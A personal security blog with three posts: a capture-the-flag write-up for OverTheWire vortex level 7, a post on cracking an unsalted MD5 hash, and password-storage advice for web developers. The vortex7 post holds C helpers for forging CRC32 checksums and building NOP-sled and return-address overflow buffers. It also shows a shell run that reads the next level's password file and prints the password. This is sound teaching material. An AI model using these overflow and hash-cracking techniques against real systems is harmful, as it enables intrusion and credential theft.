blog.ant0i.net - my little techie blog: cryptography

Wednesday, September 26, 2012

vortex7

About a year ago I stumbled upon the Over The Wire hacker challenges and started solving the first set of levels (called vortex). Since then, I have been publishing my solutions in my blog. Here is vortex level 7:

The code

int main(int argc, char **argv)
{
        char buf[58];
        u_int32_t hi;
        if((hi = crc32(0, argv[1], strlen(argv[1]))) == 0xe1ca95ee) {
                strcpy(buf, argv[1]);
        } else {
                printf("0x%08x\n", hi);
        }
}

The vulnerability exposed in this code is a basic buffer overflow with two subtleties:

The CRC of the argument must equal a given value (0xe1ca95ee)
The buffer is rather small (58 bytes)

Manipulating the checksum

The cyclic redundancy check (CRC) computes a check value (or checksum) that is used to detect accidental changes in data, e.g. when transmitting over unreliable communication channels. With this error-detecting code, even the slightest change (i.e. a bit-flip) in the input data results in a different checksum. Unlike cryptographic hash functions such as SHA1 or MD5, CRC offers no preimage resistance: it is not designed to withstand preimage attacks, and given a checksum C it is not hard to find an input m such that CRC(m) = C. As such, one shouldn't rely on it for integrity checks over insecure channels, since it is very easy to manipulate, as the solution shows.

To solve this level, I chose to apply the CRC-reversing algorithm described in Reversing CRC – Theory and Practice, which by the way also contains a very nice introduction to CRC. The method consists of appending a 32-bit pattern to the buffer in order to adjust the CRC remainder to the desired checksum. The same principle is proposed in the suggested reading, CRC and how to Reverse it. However, whereas the first approach uses the inverse of the divisor polynomial, the second derives the bit pattern from a system of equations.
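To make the idea of appending a 32-bit pattern more concrete, here is a minimal sketch. It is not the algorithm from either paper verbatim: it assumes the common reflected CRC-32 polynomial (0xEDB88320) with no initial or final XOR, and the names crc32_update(), crc32_step_back() and crc32_patch() are my own, hypothetical helpers. The trick is to run the register backwards from the target over four zero bytes and then XOR the result with the current register value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: reflected CRC-32 polynomial 0xEDB88320, no initial or final XOR. */
static uint32_t crc_table[256];

/* Fill the 256-entry lookup table; call once before anything else. */
static void make_crc_table(void)
{
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ 0xEDB88320u : c >> 1;
        crc_table[i] = c;
    }
}

/* Advance the CRC register over n bytes (table-driven, LSB first). */
static uint32_t crc32_update(uint32_t crc, const unsigned char *p, size_t n)
{
    while (n--)
        crc = (crc >> 8) ^ crc_table[(crc ^ *p++) & 0xFF];
    return crc;
}

/* Undo one step that consumed a zero byte. The top bytes of the table
 * entries are all distinct, so the top byte of crc identifies the entry. */
static uint32_t crc32_step_back(uint32_t crc)
{
    for (uint32_t i = 0; i < 256; i++)
        if ((crc_table[i] >> 24) == (crc >> 24))
            return ((crc ^ crc_table[i]) << 8) | i;
    assert(!"make_crc_table() was not called");
    return 0;
}

/* Compute 4 bytes that move the register from `current` to `target`. */
static void crc32_patch(uint32_t current, uint32_t target, unsigned char out[4])
{
    uint32_t x = target;
    for (int k = 0; k < 4; k++)
        x = crc32_step_back(x);  /* state that reaches target via 4 zero bytes */
    x ^= current;                /* the patch bytes make up the difference */
    for (int k = 0; k < 4; k++)
        out[k] = (unsigned char)(x >> (8 * k));
}
```

After make_crc_table(), you would compute the register over the prefix with crc32_update(0, prefix, len), pass it to crc32_patch() together with the target, and append the four resulting bytes. Note that nothing prevents a patch byte from being \0, which cannot be passed inside a command line argument; in that case changing a byte of the prefix and recomputing should help.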

Overflowing the buffer

This level contains a classic vulnerability which can easily be exploited to execute arbitrary code: a buffer overflow. The strcpy standard library function copies one buffer to another while completely disregarding the destination's capacity. If the source is larger than the destination, all bytes are copied anyway, past the destination's bound, overwriting whatever follows it in memory.
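For contrast, this is roughly the check that strcpy does not perform. It is only a sketch: copy_checked() is a hypothetical helper of mine, not part of the level's code or of the standard library.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if src would overflow dst. */
static int copy_checked(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL);
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;              /* strcpy would write past dst here */
    memcpy(dst, src, len + 1);  /* +1 copies the terminating '\0' */
    return 0;
}
```

With the 58-byte buffer from the level, copy_checked(buf, sizeof buf, argv[1]) would accept at most 57 characters plus the terminator and reject anything longer instead of overwriting the stack.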

Intercepting the instruction pointer

Depending on where the destination buffer is located in the process memory, it may be possible for an attacker to influence the program's execution flow. In this case, the destination buffer is on the stack. By overflowing the buffer, i.e. copying bytes past its bound, the saved eip value is overwritten. This is the address of the instruction to return to after leaving the current stack frame, i.e. when returning from the current function call. By choosing this value carefully, it is possible to redirect the execution of the program to any executable location in memory.

Creating a shellcode

The payload we want to execute consists of a small fragment of x86 machine instructions, which perform two or three syscalls that allow us to run a shell:

geteuid()/setreuid() are used to set the effective user-id. The exploited binary has the suid bit set, which means the process runs with the privileges of the file owner (the user that has read privileges for the next level's password file).
execve() is called to run /bin/bash.

The original x86/asm code can be found here. Check out the Makefile to see how it is compiled and the raw instruction data is extracted. It is then necessary to encode the data to avoid specific patterns such as \0 bytes. I used metasploit's msfencode tool for this.

Executing arbitrary code

Since the buffer is rather small (58 bytes), it is difficult to fit the malicious payload into it. An alternative way to place arbitrary data in the process memory is to define an environment variable containing the data. It will be located at the beginning (the base) of the stack. The overflow must then overwrite the saved eip value so that it points at the corresponding region in memory. Unfortunately, this address cannot be deduced precisely. Therefore, a common strategy consists of prepending a large number of nop instructions to the shellcode. This extends the landing zone for the target address, thus increasing the probability of hitting the shellcode.
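The layout of such a payload can be sketched as follows. This is an illustration under my own assumptions, not the code from the exploit: the function signature is hypothetical, and the code bytes are whatever encoded shellcode you pass in (it must not contain \0 bytes if the result is used as an environment string).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NOP 0x90  /* x86 single-byte no-op */

/* Hypothetical sketch: write sled_len NOPs followed by code into out,
 * NUL-terminated so it can be used as an environment string.
 * Returns the payload length (without the terminator),
 * or 0 if out is too small. */
static size_t make_payload(unsigned char *out, size_t out_size,
                           size_t sled_len,
                           const unsigned char *code, size_t code_len)
{
    assert(out != NULL && code != NULL);
    if (sled_len > out_size || code_len >= out_size - sled_len)
        return 0;
    memset(out, NOP, sled_len);              /* the landing zone */
    memcpy(out + sled_len, code, code_len);  /* the actual instructions */
    out[sled_len + code_len] = '\0';
    return sled_len + code_len;
}
```

Any target address that falls within the first sled_len bytes works equally well, because execution simply slides through the NOPs into the code. The longer the sled, the less precise the guessed address has to be.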

The exploit

The finalized exploit is available here. It is a C wrapper which prepares the shellcode and the buffer contents and calls the binary to exploit. I used the following functions from SAR-PR-2006-05 to implement the table-driven CRC32 algorithm:

make_crc_table()
crc32_tabledriven()
fix_crc_end()

Since at first the resulting checksum values did not match the ones generated by vortex7, I additionally extracted the CRC32 table from the binary and stored it in crc_table_static. I then realized that the vortex7 implementation actually uses 0x00000000 instead of 0xFFFFFFFF for INITXOR and FINALXOR.
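The effect of these two parameters is easy to reproduce with a small bitwise implementation. This is a sketch, assuming the common reflected polynomial 0xEDB88320; crc32_param() is a hypothetical name, and the bit-by-bit loop is used here only to keep the example short (the exploit itself is table-driven).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bitwise reflected CRC-32 with configurable initial and final XOR values.
 * Assumption: polynomial 0xEDB88320, as in the common CRC-32. */
static uint32_t crc32_param(const unsigned char *p, size_t n,
                            uint32_t initxor, uint32_t finalxor)
{
    assert(p != NULL || n == 0);
    uint32_t crc = initxor;
    while (n--) {
        crc ^= *p++;
        for (int k = 0; k < 8; k++)
            crc = (crc & 1) ? (crc >> 1) ^ 0xEDB88320u : crc >> 1;
    }
    return crc ^ finalxor;
}
```

With both values set to 0xFFFFFFFF, the string "123456789" yields the well-known check value 0xCBF43926. With both set to 0 the result differs, which is the kind of mismatch described above. A side effect of the zero initial value is that leading \0 bytes do not change the checksum at all.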

The fix_crc_end() function adjusts the buffer such that its checksum eventually results in the desired value 0xe1ca95ee.

make_buffer() creates the data used to overflow the buffer. It contains a repeated sequence of the target address, which can be shifted bytewise in order to adjust its alignment. make_payload() generates the buffer which contains the nop sled and the shellcode.
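A buffer of repeated addresses with an adjustable alignment could be built along these lines. This is a sketch with a hypothetical signature, not the function from the exploit: here the shift is implemented by prepending filler bytes, and the address is written in little-endian order as on x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical sketch: `shift` filler bytes, then `repeats` copies of addr
 * in little-endian byte order (x86), then a terminating '\0'.
 * Returns the string length, or 0 if out is too small. */
static size_t make_buffer(unsigned char *out, size_t out_size,
                          uint32_t addr, size_t shift, size_t repeats)
{
    assert(out != NULL);
    size_t len = shift + 4 * repeats;
    if (len + 1 > out_size)
        return 0;
    memset(out, 'A', shift);  /* filler that moves the alignment */
    for (size_t i = 0; i < repeats; i++)
        for (int k = 0; k < 4; k++)
            out[shift + 4 * i + k] = (unsigned char)(addr >> (8 * k));
    out[len] = '\0';
    return len;
}
```

Repeating the address means one of the copies will land exactly on the saved eip as long as the shift matches the distance to it modulo 4. An address containing a \0 byte would cut the string short when passed as an argument, so such addresses have to be avoided.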

Finally, the wrapper executes vortex7, passing the address buffer as a command line argument and the payload in the environment variables.

The program expects two arguments:

An offset for the target address, relative to the environment pointer taken from the current process (the wrapper).
An alignment index (0-4) used to align the target address in the buffer.

The following arguments worked for me:

$ ./v7_wrapper 0 2
Using address: 0xFFFFD91F
$ whoami
vortex8

The password for the next level is then retrieved from its password file:

$ cat /etc/vortex_pass/vortex8 
X70A_gcgl

That's it! If you want to learn more about buffer overflows, I suggest you read Smashing the Stack for Fun and Profit by aleph1, originally posted in Phrack Magazine. Also have a look at my blog where I regularly publish vortex level solutions: blog.ant0i.net

Wednesday, July 18, 2012

vortex5

Vortex level 5 consists of cracking a password hashed with MD5, i.e. mounting a preimage attack. No salt was used when applying the hash function, which makes it very easy by today's means to find the original value.

The fastest way I found to achieve this is searching for the hash value with Google. Of course this will return lots of references to this level's solution, but you'll also get results for some websites that publish datasets of precomputed hashes, like for example md5crack or md5this.

Alternatively, you could crack the MD5 hash using a tool such as John The Ripper to perform a brute force attack. In the worst case this could result in computing all 62^5 (about 916 million) combinations of the password (it was specified to be 5 characters long and consisting of a-zA-Z0-9). To restrict the number of tries, you can provide a wordlist of plausible passwords. Obviously, this will only produce a result if the password is in the list. This method works best when using real password data (e.g. from a leaked password database), since people tend to use similar patterns and also reuse their passwords.
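The size of that search space, and the way a brute force tool walks through it, can be sketched in a few lines. The helper names are hypothetical and the ordering of the alphabet is my own choice. A real attack would additionally hash each candidate with MD5 and compare it to the target, which is left out here because MD5 is not part of the C standard library.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static const char ALPHABET[] =
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
#define ALPHABET_LEN (sizeof ALPHABET - 1)  /* 62 characters */
#define PW_LEN 5

/* Number of candidates: ALPHABET_LEN raised to the power PW_LEN. */
static uint64_t keyspace(void)
{
    uint64_t n = 1;
    for (int i = 0; i < PW_LEN; i++)
        n *= ALPHABET_LEN;
    return n;
}

/* Map an index in [0, keyspace()) to its candidate, like counting in base 62. */
static void nth_candidate(uint64_t index, char out[PW_LEN + 1])
{
    assert(index < keyspace());
    for (int i = PW_LEN - 1; i >= 0; i--) {
        out[i] = ALPHABET[index % ALPHABET_LEN];
        index /= ALPHABET_LEN;
    }
    out[PW_LEN] = '\0';
}
```

Looping an index from 0 to keyspace() - 1 and calling nth_candidate() for each value enumerates every possible password exactly once, from "aaaaa" to "99999".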

Other tools such as RainbowCrack perform the attack using a rainbow table: a data structure used for the efficient storage of precomputed hash values. As with the websites mentioned above, you can easily get hold of various tables, ranging from 50 to 500 GB depending on the space of hashed values.

Sunday, March 4, 2012

Password Security 101 for Web Developers

Passwords are still the only means of authentication for I'd say 99.95% of all online services including social networking sites, online shops and even e-banking applications. When you think about the consequences of a password theft, say for your personal email account, you'll soon realize that a password such as 123456, iloveyou or your mom's birthdate is totally insufficient... (see this and change your password everywhere if you get a match).

There are lots of articles that will tell you what a (more) secure password looks like (I especially like this one as well as its illustration). And although many web sites will impose some password policy during registration that will reject any password unless it contains some digit or special characters, the choice (and the complexity) is ultimately left to the user. What's unavoidable is that users are almost certainly going to reuse at least one password sometime for one or the other online service. Haven't you also? (don't blush).

So what can you as a developer do about it? I don't know, but I can tell you what you should totally avoid if you don't want yourself and your company to be looked at as total newbs.

First realize that passwords are the user's property and you have a duty to treat that information with absolute care. Every single one of your clients has spent the effort of selecting some unnatural string, repeating the process until it complied with your password policy and spending the rest of the day trying not to forget it. This is the reason why users will eventually reuse a password. So bear in mind that you're not storing a user's password for your web application only, but most probably also for a number of other services the user has registered with. Respecting your client's integrity means that you will never disclose that data, not even internally within your company.

The most important precaution you should take when dealing with password data is: never ever store passwords in clear text. No system is safe enough, not even yours. And the risk's not worth it. If you don't know how to avoid storing passwords in clear text, learn about hash functions and salting.

Second rule: never ever send a password back to the user (for instance via email). This is totally unprofessional. You're not only showing your client that you're storing passwords in clear text (i.e. that you're a newb), you're also compromising their password by sending it over an insecure channel.

I assume companies do this to reduce support cases related to lost passwords. They should rethink this. Recent attacks have shown how much damage is caused to the company (reputation) as well as to their clients by having confidential user data stolen. Think about RSA, the Sony Playstation network or recently Youporn (should you not know, the most popular pornographic website)...